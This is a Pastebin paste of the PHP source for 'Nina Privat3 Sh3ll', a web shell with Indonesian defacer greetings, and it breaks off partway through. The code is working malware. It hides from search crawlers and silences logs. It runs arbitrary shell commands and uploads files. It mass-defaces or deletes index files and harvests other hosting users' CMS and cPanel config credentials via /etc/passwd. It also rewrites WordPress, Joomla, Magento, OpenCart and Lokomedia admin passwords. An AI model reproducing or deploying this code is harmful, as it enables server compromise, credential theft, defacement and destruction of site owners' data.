doaemak56

nina shell

May 16th, 2016
207
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 62.40 KB | None | 0 0
  1. <html>
  2. <head>
  3. <title>Nina Privat3 Sh3ll</title>
  4. <meta name='author' content='Nina Privat3 Sh3ll'>
  5. <meta charset="UTF-8">
  6. <style type='text/css'>
  7. html {
  8. background: url("http://oi63.tinypic.com/2aet7w4.jpg") no-repeat scroll 0 0 #000; background-size: 100% auto;
  9. color: aqua ;
  10. font-family: "Racing Sans One", cursive;
  11. font-size: 13px;
  12. width: 100%;
  13. }
  14. li {
  15. display: inline;
  16. margin: 5px;
  17. padding: 5px;
  18. }
  19. table, th, td {
  20. border-collapse:collapse;
  21. font-family: "Racing Sans One", cursive;
  22. background: transparent;
  23. font-family: "Racing Sans One", cursive;
  24. font-size: 13px;
  25. }
  26. .table_home, .th_home, .td_home {
  27. border: 1px dotted aqua;
  28. }
  29. th {
  30. padding: 10px;
  31. }
  32. a {
  33. color: #ffffff;
  34. text-decoration: none;
  35. }
  36. a:hover {
  37. color: aqua;
  38. text-decoration: underline;
  39. text-shadow:0px 0px 1px #757575;
  40. }
  41. b {
  42. color: gold;
  43. }
  44. input[type=text], input[type=password],input[type=submit] {
  45. background: transparent;
  46. color: #ffffff;
  47. border: 1px solid #ffffff;
  48. margin: 5px auto;
  49. padding-left: 5px;
  50. font-family: "Racing Sans One", cursive;
  51. font-size: 13px;
  52. }
  53. textarea {
  54. border: 1px solid #ffffff;
  55. width: 100%;
  56. height: 400px;
  57. padding-left: 5px;
  58. margin: 10px auto;
  59. resize: none;
  60. background: transparent;
  61. color: #ffffff;
  62. font-family: "Racing Sans One", cursive;
  63. font-size: 13px;
  64. }
  65. </style>
  66. </head>
  67. <?php
  68. $auth_pass = "d70035a3eebaa6dfb535b039cacb0bf8"; //janninaweigel
  69. $color = "#00ff00";
  70. $sec = 1;
  71. $default_action = 'FilesMan';
  72. @define('SELF_PATH', __FILE__);
  73. if (strpos($_SERVER['HTTP_USER_AGENT'], 'Google') !== false) {
  74. header('HTTP/1.0 404 Not Found');
  75. exit;
  76. }
  77. @session_start();
  78. @error_reporting(0);
  79. @ini_set('error_log', NULL);
  80. @ini_set('log_errors', 0);
  81. @ini_set('max_execution_time', 0);
  82. @set_time_limit(0);
  83. @set_magic_quotes_runtime(0);
  84. @define('VERSION', '2.1');
  85. if (get_magic_quotes_gpc()) {
  86. function stripslashes_array($array) {
  87. return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
  88. }
  89. $_POST = stripslashes_array($_POST);
  90. }
  91. function printLogin() {
  92. ?>
  93. </head><body>
  94. <center><blink><h1>Jannine Weigel Fans Indonesian</h1></blink></center>
  95. <hr>
  96. <center><address>Login To <?=$_SERVER['HTTP_HOST'] ?> Access Shell ~_^</address></center>
  97. <style>
  98. input { margin:0;background-color:#fff;border:1px solid #fff; }
  99. </style>
  100. <center>
  101. <form method=post>
  102. <input type=password name=pass>
  103. </form></center>
  104.  
  105. </td></tr></table>
  106. <center><font style="color:white;font size:8px;text-align: center;font-family:Pirata One;text-shadow: 0 0 3px #0000FF, 0px 0px 5px #00FFFF,0 0 5px #00FFFF,0 0 5px aqua;"><font face="Pirata One" color=red size=5></font>
  107. <footer id="det" style="position:fixed; left:0px; right:0px; bottom:0px; background:transparent; border-top: 1px solid aqua; border-bottom: 1px solid aqua"><font style="font:20px courier;color:#FF0000;"><font style="font:17px courier;color:aqua;"><b>Greetz :</b></font></font><font face="Tahoma" size="4" color="Red">[</font><font face="Courier" size="4" color="aqua"><b><marquee scrollamount="5" scrolldelay="50" width="85%"> ~ Bekasi X Code ~ Bekasi Hacker Team ~ Bekasi Carder Link ~ Bekasi Jones Attacker ~ Jannine Weigel Fans Indonesian ~ </b> </marquee></foottyle="margin: 0px; padding: 0px"></font><font face="Tahoma" size="4" color="Red">]</font><style>
  108. </body>
  109. </html>
  110. <?php
  111. exit;
  112. }
  113. if ($sec == 1 && !isset($_SESSION[md5($_SERVER['HTTP_HOST']) ])) if (empty($auth_pass) || (isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))) $_SESSION[md5($_SERVER['HTTP_HOST']) ] = true;
  114. else printLogin();
  115. if (!empty($_SERVER['HTTP_USER_AGENT'])) {
  116. $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
  117. if (preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  118. header('HTTP/1.0 404 Not Found');
  119. exit;
  120. }
  121. }
  122. echo "<meta name=\"ROBOTS\" content=\"NOINDEX, NOFOLLOW\" />"; //For Ensuring... Fuck all Robots...
  123.  
  124. function w($dir,$perm) {
  125. if(!is_writable($dir)) {
  126. return "<font color=red>".$perm."</font>";
  127. } else {
  128. return "<font color=aqua>".$perm."</font>";
  129. }
  130. }
  131. function exe($cmd) {
  132. if(function_exists('system')) {
  133. @ob_start();
  134. @system($cmd);
  135. $buff = @ob_get_contents();
  136. @ob_end_clean();
  137. return $buff;
  138. } elseif(function_exists('exec')) {
  139. @exec($cmd,$results);
  140. $buff = "";
  141. foreach($results as $result) {
  142. $buff .= $result;
  143. } return $buff;
  144. } elseif(function_exists('passthru')) {
  145. @ob_start();
  146. @passthru($cmd);
  147. $buff = @ob_get_contents();
  148. @ob_end_clean();
  149. return $buff;
  150. } elseif(function_exists('shell_exec')) {
  151. $buff = @shell_exec($cmd);
  152. return $buff;
  153. }
  154. }
  155. function perms($file){
  156. $perms = fileperms($file);
  157. if (($perms & 0xC000) == 0xC000) {
  158. // Socket
  159. $info = 's';
  160. } elseif (($perms & 0xA000) == 0xA000) {
  161. // Symbolic Link
  162. $info = 'l';
  163. } elseif (($perms & 0x8000) == 0x8000) {
  164. // Regular
  165. $info = '-';
  166. } elseif (($perms & 0x6000) == 0x6000) {
  167. // Block special
  168. $info = 'b';
  169. } elseif (($perms & 0x4000) == 0x4000) {
  170. // Directory
  171. $info = 'd';
  172. } elseif (($perms & 0x2000) == 0x2000) {
  173. // Character special
  174. $info = 'c';
  175. } elseif (($perms & 0x1000) == 0x1000) {
  176. // FIFO pipe
  177. $info = 'p';
  178. } else {
  179. // Unknown
  180. $info = 'u';
  181. }
  182. // Owner
  183. $info .= (($perms & 0x0100) ? 'r' : '-');
  184. $info .= (($perms & 0x0080) ? 'w' : '-');
  185. $info .= (($perms & 0x0040) ?
  186. (($perms & 0x0800) ? 's' : 'x' ) :
  187. (($perms & 0x0800) ? 'S' : '-'));
  188. // Group
  189. $info .= (($perms & 0x0020) ? 'r' : '-');
  190. $info .= (($perms & 0x0010) ? 'w' : '-');
  191. $info .= (($perms & 0x0008) ?
  192. (($perms & 0x0400) ? 's' : 'x' ) :
  193. (($perms & 0x0400) ? 'S' : '-'));
  194. // World
  195. $info .= (($perms & 0x0004) ? 'r' : '-');
  196. $info .= (($perms & 0x0002) ? 'w' : '-');
  197. $info .= (($perms & 0x0001) ?
  198. (($perms & 0x0200) ? 't' : 'x' ) :
  199. (($perms & 0x0200) ? 'T' : '-'));
  200. return $info;
  201. }
  202. function hdd($s) {
  203. if($s >= 1073741824)
  204. return sprintf('%1.2f',$s / 1073741824 ).' GB';
  205. elseif($s >= 1048576)
  206. return sprintf('%1.2f',$s / 1048576 ) .' MB';
  207. elseif($s >= 1024)
  208. return sprintf('%1.2f',$s / 1024 ) .' KB';
  209. else
  210. return $s .' B';
  211. }
  212. function ambilKata($param, $kata1, $kata2){
  213. if(strpos($param, $kata1) === FALSE) return FALSE;
  214. if(strpos($param, $kata2) === FALSE) return FALSE;
  215. $start = strpos($param, $kata1) + strlen($kata1);
  216. $end = strpos($param, $kata2, $start);
  217. $return = substr($param, $start, $end - $start);
  218. return $return;
  219. }
  220. if(get_magic_quotes_gpc()) {
  221. function idx_ss($array) {
  222. return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
  223. }
  224. $_POST = idx_ss($_POST);
  225. }
  226.  
  227. error_reporting(0);
  228. error_log(0);
  229. @ini_set('error_log',NULL);
  230. @ini_set('log_errors',0);
  231. @ini_set('max_execution_time',0);
  232. @set_time_limit(0);
  233. @set_magic_quotes_runtime(0);
  234. if(isset($_GET['dir'])) {
  235. $dir = $_GET['dir'];
  236. chdir($_GET['dir']);
  237. } else {
  238. $dir = getcwd();
  239. }
  240. $dir = str_replace("\\","/",$dir);
  241. $scdir = explode("/", $dir);
  242. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=white>OFF</font>";
  243. $ds = @ini_get("disable_functions");
  244. $mysql = (function_exists('mysql_connect')) ? "<font color=white>ON</font>" : "<font color=red>OFF</font>";
  245. $curl = (function_exists('curl_version')) ? "<font color=white>ON</font>" : "<font color=red>OFF</font>";
  246. $wget = (exe('wget --help')) ? "<font color=white>ON</font>" : "<font color=red>OFF</font>";
  247. $perl = (exe('perl --help')) ? "<font color=white>ON</font>" : "<font color=red>OFF</font>";
  248. $python = (exe('python --help')) ? "<font color=white>ON</font>" : "<font color=red>OFF</font>";
  249. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=white>NONE</font>";
  250. if(!function_exists('posix_getegid')) {
  251. $user = @get_current_user();
  252. $uid = @getmyuid();
  253. $gid = @getmygid();
  254. $group = "?";
  255. } else {
  256. $uid = @posix_getpwuid(posix_geteuid());
  257. $gid = @posix_getgrgid(posix_getegid());
  258. $user = $uid['name'];
  259. $uid = $uid['uid'];
  260. $group = $gid['name'];
  261. $gid = $gid['gid'];
  262. }
  263. echo "System: <font color=white>".php_uname()."</font><br>";
  264. echo "User: <font color=white>".$user."</font> (".$uid.") Group: <font color=white>".$group."</font> (".$gid.")<br>";
  265. echo "Server IP: <font color=white>".gethostbyname($_SERVER['HTTP_HOST'])."</font> | Your IP: <font color=white>".$_SERVER['REMOTE_ADDR']."</font><br>";
  266. echo "HDD: <font color=white>".hdd(disk_free_space("/"))."</font> / <font color=white>".hdd(disk_total_space("/"))."</font><br>";
  267. echo "Safe Mode: $sm<br>";
  268. echo "Disable Functions: $show_ds<br>";
  269. echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
  270. echo "Current DIR: ";
  271. foreach($scdir as $c_dir => $cdir) {
  272. echo "<a href='?dir=";
  273. for($i = 0; $i <= $c_dir; $i++) {
  274. echo $scdir[$i];
  275. if($i != $c_dir) {
  276. echo "/";
  277. }
  278. }
  279. echo "'>$cdir</a>/";
  280. }
  281. echo "<hr>";
  282. echo "<center>";
  283. echo "<ul>";
  284. echo "<li>[ <a href='?'>Home</a> ]</li>";
  285. echo "<li>[ <a href='?dir=$dir&do=upload'>Upload</a> ]</li>";
  286. echo "<li>[ <a href='?dir=$dir&do=cmd'>Command</a> ]</li>";
  287. echo "<li>[ <a href='?dir=$dir&do=mass_deface'>Mass Deface</a> ]</li>";
  288. echo "<li>[ <a href='?dir=$dir&do=mass_delete'>Mass Delete</a> ]</li>";
  289. echo "<li>[ <a href='?dir=$dir&do=config'>Config</a> ]</li>";
  290. echo "<li>[ <a href='?dir=$dir&do=jumping'>Jumping</a> ]</li>";
  291. echo "<li>[ <a href='?dir=$dir&do=cpanel'>CPanel Crack</a> ]</li>";
  292. echo "<li>[ <a href='?dir=$dir&do=smtp'>SMTP Grabber</a> ]</li>";
  293. echo "<li>[ <a href='?dir=$dir&do=zoneh'>Zone-H</a> ]</li>";
  294. echo "<li>[ <a href='?dir=$dir&do=cgi'>CGI Telnet</a> ]</li>";
  295. echo "<li>[ <a href='?dir=$dir&do=adminer'>Adminer</a> ]</li>";
  296. echo "<li>[ <a href='?dir=$dir&do=fake_root'>Fake Root</a> ]</li><br>";
  297. echo "<li>[ <a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a> ]</li>";
  298. echo "<li>[ <a href='?dir=$dir&do=auto_wp'>Auto Edit Title WordPress</a> ]</li>";
  299. echo "<li>[ <a href='?dir=$dir&do=auto_dwp'>WordPress Auto Deface</a> ]</li>";
  300. echo "<li>[ <a href='?dir=$dir&do=auto_dwp2'>WordPress Auto Deface V.2</a> ]</li>";
  301. echo "</ul>";
  302. echo "</center>";
  303. echo "<hr>";
  304. if($_GET['do'] == 'upload') {
  305. echo "<center>";
  306. if($_POST['upload']) {
  307. if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
  308. $act = "<font color=white>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
  309. } else {
  310. $act = "<font color=red>failed to upload file</font>";
  311. }
  312. }
  313. echo "Upload File: [ ".w($dir,"Writeable")." ]<form method='post' enctype='multipart/form-data'><input type='file' name='ix_file'><input type='submit' value='upload' name='upload'></form>";
  314. echo $act;
  315. echo "</center>";
  316. } elseif($_GET['do'] == 'cmd') {
  317. echo "<form method='post'>
  318. <font style='text-decoration: underline;'>".$user."@".gethostbyname($_SERVER['HTTP_HOST']).":~# </font>
  319. <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
  320. </form>";
  321. if($_POST['do_cmd']) {
  322. echo "<pre>".exe($_POST['cmd'])."</pre>";
  323. }
  324. } elseif($_GET['do'] == 'mass_deface') {
  325. function sabun_massal($dir,$namafile,$isi_script) {
  326. if(is_writable($dir)) {
  327. $dira = scandir($dir);
  328. foreach($dira as $dirb) {
  329. $dirc = "$dir/$dirb";
  330. $lokasi = $dirc.'/'.$namafile;
  331. if($dirb === '.') {
  332. file_put_contents($lokasi, $isi_script);
  333. } elseif($dirb === '..') {
  334. file_put_contents($lokasi, $isi_script);
  335. } else {
  336. if(is_dir($dirc)) {
  337. if(is_writable($dirc)) {
  338. echo "[<font color=white>DONE</font>] $lokasi<br>";
  339. file_put_contents($lokasi, $isi_script);
  340. $idx = sabun_massal($dirc,$namafile,$isi_script);
  341. }
  342. }
  343. }
  344. }
  345. }
  346. }
  347. if($_POST['start']) {
  348. echo "<div style='margin: 5px auto; padding: 5px'>";
  349. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  350. echo "</div>";
  351. } else {
  352. echo "<center>";
  353. echo "<form method='post'>
  354. <font style='text-decoration: underline;'>Folder:</font><br>
  355. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  356. <font style='text-decoration: underline;'>Filename:</font><br>
  357. <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
  358. <font style='text-decoration: underline;'>Index File:</font><br>
  359. <textarea name='script' style='width: 450px; height: 200px;'>Hacked By Vilvato</textarea><br>
  360. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  361. </form></center>";
  362. }
  363. } elseif($_GET['do'] == 'mass_delete') {
  364. function hapus_massal($dir,$namafile) {
  365. if(is_writable($dir)) {
  366. $dira = scandir($dir);
  367. foreach($dira as $dirb) {
  368. $dirc = "$dir/$dirb";
  369. $lokasi = $dirc.'/'.$namafile;
  370. if($dirb === '.') {
  371. if(file_exists("$dir/$namafile")) {
  372. unlink("$dir/$namafile");
  373. }
  374. } elseif($dirb === '..') {
  375. if(file_exists("".dirname($dir)."/$namafile")) {
  376. unlink("".dirname($dir)."/$namafile");
  377. }
  378. } else {
  379. if(is_dir($dirc)) {
  380. if(is_writable($dirc)) {
  381. if(file_exists($lokasi)) {
  382. echo "[<font color=white>DELETED</font>] $lokasi<br>";
  383. unlink($lokasi);
  384. $idx = hapus_massal($dirc,$namafile);
  385. }
  386. }
  387. }
  388. }
  389. }
  390. }
  391. }
  392. if($_POST['start']) {
  393. echo "<div style='margin: 5px auto; padding: 5px'>";
  394. hapus_massal($_POST['d_dir'], $_POST['d_file']);
  395. echo "</div>";
  396. } else {
  397. echo "<center>";
  398. echo "<form method='post'>
  399. <font style='text-decoration: underline;'>Folder:</font><br>
  400. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  401. <font style='text-decoration: underline;'>Filename:</font><br>
  402. <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
  403. <input type='submit' name='start' value='Mass Delete' style='width: 450px;'>
  404. </form></center>";
  405. }
  406. } elseif($_GET['do'] == 'config') {
  407. $etc = fopen("/etc/passwd", "r");
  408. $idx = mkdir("idx_config", 0777);
  409. $isi_htc = "Options all\nRequire None\nSatisfy Any";
  410. $htc = fopen("idx_config/.htaccess","w");
  411. fwrite($htc, $isi_htc);
  412. while($passwd = fgets($etc)) {
  413. if($passwd == "" || !$etc) {
  414. echo "<font color=red>Can't read /etc/passwd</font>";
  415. } else {
  416. preg_match_all('/(.*?):x:/', $passwd, $user_config);
  417. foreach($user_config[1] as $user_idx) {
  418. $user_config_dir = "/home/$user_idx/public_html/";
  419. if(is_readable($user_config_dir)) {
  420. $grab_config = array(
  421. "/home/$user_idx/.my.cnf" => "cpanel",
  422. "/home/$user_idx/.accesshash" => "WHM-accesshash",
  423. "/home/$user_idx/public_html/bw-configs/config.ini" => "BosWeb",
  424. "/home/$user_idx/public_html/config/koneksi.php" => "Lokomedia",
  425. "/home/$user_idx/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  426. "/home/$user_idx/public_html/clientarea/configuration.php" => "WHMCS",
  427. "/home/$user_idx/public_html/whm/configuration.php" => "WHMCS",
  428. "/home/$user_idx/public_html/whmcs/configuration.php" => "WHMCS",
  429. "/home/$user_idx/public_html/forum/config.php" => "phpBB",
  430. "/home/$user_idx/public_html/sites/default/settings.php" => "Drupal",
  431. "/home/$user_idx/public_html/config/settings.inc.php" => "PrestaShop",
  432. "/home/$user_idx/public_html/app/etc/local.xml" => "Magento",
  433. "/home/$user_idx/public_html/joomla/configuration.php" => "Joomla",
  434. "/home/$user_idx/public_html/configuration.php" => "Joomla",
  435. "/home/$user_idx/public_html/wp/wp-config.php" => "WordPress",
  436. "/home/$user_idx/public_html/wordpress/wp-config.php" => "WordPress",
  437. "/home/$user_idx/public_html/wp-config.php" => "WordPress",
  438. "/home/$user_idx/public_html/admin/config.php" => "OpenCart",
  439. "/home/$user_idx/public_html/slconfig.php" => "Sitelok",
  440. "/home/$user_idx/public_html/application/config/database.php" => "Ellislab");
  441. foreach($grab_config as $config => $nama_config) {
  442. $ambil_config = file_get_contents($config);
  443. if($ambil_config == '') {
  444. } else {
  445. $file_config = fopen("idx_config/$user_idx-$nama_config.txt","w");
  446. fputs($file_config,$ambil_config);
  447. }
  448. }
  449. }
  450. }
  451. }
  452. }
  453. echo "<center><a href='?dir=$dir/idx_config'><font color=white>Done</font></a></center>";
  454. } elseif($_GET['do'] == 'jumping') {
  455. $i = 0;
  456. echo "<pre><div class='margin: 5px auto;'>";
  457. $etc = fopen("/etc/passwd", "r");
  458. while($passwd = fgets($etc)) {
  459. if($passwd == '' || !$etc) {
  460. echo "<font color=red>Can't read /etc/passwd</font>";
  461. } else {
  462. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  463. foreach($user_jumping[1] as $user_idx_jump) {
  464. $user_jumping_dir = "/home/$user_idx_jump/public_html";
  465. if(is_readable($user_jumping_dir)) {
  466. $i++;
  467. $jrw = "[<font color=white>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  468. if(is_writable($user_jumping_dir)) {
  469. $jrw = "[<font color=white>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  470. }
  471. echo $jrw;
  472. $domain_jump = file_get_contents("/etc/named.conf");
  473. if($domain_jump == '') {
  474. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  475. } else {
  476. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  477. foreach($domains_jump[1] as $dj) {
  478. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  479. $user_jumping_url = $user_jumping_url['name'];
  480. if($user_jumping_url == $user_idx_jump) {
  481. echo " => ( <u>$dj</u> )<br>";
  482. break;
  483. }
  484. }
  485. }
  486. }
  487. }
  488. }
  489. }
  490. if($i == 0) {
  491. } else {
  492. echo "<br>Total ada ".$i." Kamar di ".gethostbyname($_SERVER['HTTP_HOST'])."";
  493. }
  494. echo "</div></pre>";
  495. } elseif($_GET['do'] == 'auto_edit_user') {
  496. if($_POST['hajar']) {
  497. if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  498. echo "username atau password harus lebih dari 6 karakter";
  499. } else {
  500. $user_baru = $_POST['user_baru'];
  501. $pass_baru = md5($_POST['pass_baru']);
  502. $conf = $_POST['config_dir'];
  503. $scan_conf = scandir($conf);
  504. foreach($scan_conf as $file_conf) {
  505. if(!is_file("$conf/$file_conf")) continue;
  506. $config = file_get_contents("$conf/$file_conf");
  507. if(preg_match("/JConfig|joomla/",$config)) {
  508. $dbhost = ambilkata($config,"host = '","'");
  509. $dbuser = ambilkata($config,"user = '","'");
  510. $dbpass = ambilkata($config,"password = '","'");
  511. $dbname = ambilkata($config,"db = '","'");
  512. $dbprefix = ambilkata($config,"dbprefix = '","'");
  513. $prefix = $dbprefix."users";
  514. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  515. $db = mysql_select_db($dbname);
  516. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  517. $result = mysql_fetch_array($q);
  518. $id = $result['id'];
  519. $site = ambilkata($config,"sitename = '","'");
  520. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  521. echo "Config => ".$file_conf."<br>";
  522. echo "CMS => Joomla<br>";
  523. if($site == '') {
  524. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  525. } else {
  526. echo "Sitename => $site<br>";
  527. }
  528. if(!$update OR !$conn OR !$db) {
  529. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  530. } else {
  531. echo "Status => <font color=white>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  532. }
  533. mysql_close($conn);
  534. } elseif(preg_match("/WordPress/",$config)) {
  535. $dbhost = ambilkata($config,"DB_HOST', '","'");
  536. $dbuser = ambilkata($config,"DB_USER', '","'");
  537. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  538. $dbname = ambilkata($config,"DB_NAME', '","'");
  539. $dbprefix = ambilkata($config,"table_prefix = '","'");
  540. $prefix = $dbprefix."users";
  541. $option = $dbprefix."options";
  542. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  543. $db = mysql_select_db($dbname);
  544. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  545. $result = mysql_fetch_array($q);
  546. $id = $result[ID];
  547. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  548. $result2 = mysql_fetch_array($q2);
  549. $target = $result2[option_value];
  550. if($target == '') {
  551. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  552. } else {
  553. $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  554. }
  555. $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  556. echo "Config => ".$file_conf."<br>";
  557. echo "CMS => Wordpress<br>";
  558. echo $url_target;
  559. if(!$update OR !$conn OR !$db) {
  560. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  561. } else {
  562. echo "Status => <font color=white>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  563. }
  564. mysql_close($conn);
  565. } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  566. $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  567. $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  568. $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  569. $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  570. $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  571. $prefix = $dbprefix."admin_user";
  572. $option = $dbprefix."core_config_data";
  573. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  574. $db = mysql_select_db($dbname);
  575. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  576. $result = mysql_fetch_array($q);
  577. $id = $result[user_id];
  578. $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  579. $result2 = mysql_fetch_array($q2);
  580. $target = $result2[value];
  581. if($target == '') {
  582. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  583. } else {
  584. $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  585. }
  586. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  587. echo "Config => ".$file_conf."<br>";
  588. echo "CMS => Magento<br>";
  589. echo $url_target;
  590. if(!$update OR !$conn OR !$db) {
  591. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  592. } else {
  593. echo "Status => <font color=white>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  594. }
  595. mysql_close($conn);
  596. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  597. $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  598. $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  599. $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  600. $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  601. $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  602. $prefix = $dbprefix."user";
  603. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  604. $db = mysql_select_db($dbname);
  605. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  606. $result = mysql_fetch_array($q);
  607. $id = $result[user_id];
  608. $target = ambilkata($config,"HTTP_SERVER', '","'");
  609. if($target == '') {
  610. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  611. } else {
  612. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  613. }
  614. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  615. echo "Config => ".$file_conf."<br>";
  616. echo "CMS => OpenCart<br>";
  617. echo $url_target;
  618. if(!$update OR !$conn OR !$db) {
  619. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  620. } else {
  621. echo "Status => <font color=white>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  622. }
  623. mysql_close($conn);
  624. } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  625. $dbhost = ambilkata($config,'server = "','"');
  626. $dbuser = ambilkata($config,'username = "','"');
  627. $dbpass = ambilkata($config,'password = "','"');
  628. $dbname = ambilkata($config,'database = "','"');
  629. $prefix = "users";
  630. $option = "identitas";
  631. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  632. $db = mysql_select_db($dbname);
  633. $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  634. $result = mysql_fetch_array($q);
  635. $target = $result[alamat_website];
  636. if($target == '') {
  637. $target2 = $result[url];
  638. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  639. if($target2 == '') {
  640. $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  641. } else {
  642. $cek_login3 = file_get_contents("$target2/adminweb/");
  643. $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  644. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  645. $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  646. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  647. $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  648. } else {
  649. $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  650. }
  651. }
  652. } else {
  653. $cek_login = file_get_contents("$target/adminweb/");
  654. $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  655. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  656. $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  657. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  658. $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  659. } else {
  660. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  661. }
  662. }
  663. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  664. echo "Config => ".$file_conf."<br>";
  665. echo "CMS => Lokomedia<br>";
  666. if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  667. echo $url_target2;
  668. } else {
  669. echo $url_target;
  670. }
  671. if(!$update OR !$conn OR !$db) {
  672. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  673. } else {
  674. echo "Status => <font color=white>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  675. }
  676. mysql_close($conn);
  677. }
  678. }
  679. }
  680. } else {
  681. echo "<center>
  682. <h1>Auto Edit User Config</h1>
  683. <form method='post'>
  684. DIR Config: <br>
  685. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  686. Set User & Pass: <br>
  687. <input type='text' name='user_baru' value='vilvato' placeholder='user_baru'><br>
  688. <input type='text' name='pass_baru' value='vilvato' placeholder='pass_baru'><br>
  689. <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
